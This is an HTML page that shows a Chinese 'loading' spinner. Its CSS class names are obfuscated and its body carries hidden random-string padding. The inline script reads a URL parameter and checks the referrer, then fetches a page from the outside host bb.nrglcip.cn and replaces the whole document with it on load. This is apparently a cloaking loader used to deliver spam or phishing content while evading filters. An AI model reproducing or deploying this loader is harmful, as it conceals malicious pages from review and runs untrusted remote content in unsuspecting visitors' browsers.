<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SHLF6qSC7B3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SHLF6qSC7B3 .SxAFdsi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SHLF6qSC7B3 .content {
            line-height: 50px;
            text-align: center
        }

        .SHLF6qSC7B3 .img {
            width: 100%
        }

        .SHLF6qSC7B3 .GOMvrKd9 {
            text-align: center
        }

        .SHLF6qSC7B3 .GOMvrKd9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SHLF6qSC7B3 .GOMvrKd9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SHLF6qSC7B3 .GOMvrKd9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SHLF6qSC7B3 .GOMvrKd9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SHLF6qSC7B3 .GOMvrKd9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SHLF6qSC7B3 .GOMvrKd9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SHLF6qSC7B3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OVjla8f3wwnf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pkinXw = OVjla8f3wwnf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pkinXw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pkinXw +".html?a=share";
		}
		
        z1ns38UBE=url+"#"+new Date().getTime();
        z1ns38UBE && function() {
            $.get(z1ns38UBE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>UKz2sh6pvL0sxzb99pphaTOyb1HH</div>
<p  style='display:none'>SOHV8l1MHWrp5iMp9fuTfBZ1m6LDg3z26BNf6mH8XCsa5yKqQ46Rphy5g11CaOsDY7R1ETQvn1I</p>
<div style='display:none'>UKz2sh6pvL0sxzb99pphaTOyb1HH</div>
<div style='display:none'>UKz2sh6pvL0sxzb99pphaTOyb1HH</div>
<ul style='display:none' >J8zVoXYkcWqoWMTkk0RBZkGHhfeAPfL5</ul>
<div style='display:none'>UKz2sh6pvL0sxzb99pphaTOyb1HH</div>
<li style='display:none' >lxcYgIOUh1XNMGiDyPFfDfh6XxNa83kE8fENkXiRzutTowOcDWZSZzN6mfET1c35q7obzLsq</li>
<p  style='display:none'>SOHV8l1MHWrp5iMp9fuTfBZ1m6LDg3z26BNf6mH8XCsa5yKqQ46Rphy5g11CaOsDY7R1ETQvn1I</p>
<img  src='' style='display:none'>
<p  style='display:none'>SOHV8l1MHWrp5iMp9fuTfBZ1m6LDg3z26BNf6mH8XCsa5yKqQ46Rphy5g11CaOsDY7R1ETQvn1I</p><div class="SHLF6qSC7B3">
    <div class="SxAFdsi">
        <div class="GOMvrKd9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>RQehO92ab8cuZi8GrFTSpYWWp</span>
<span style='display:none'>RQehO92ab8cuZi8GrFTSpYWWp</span>
<ul style='display:none' >qqXQSvct1PxTBUO9QBk4Q5</ul></body>
</html>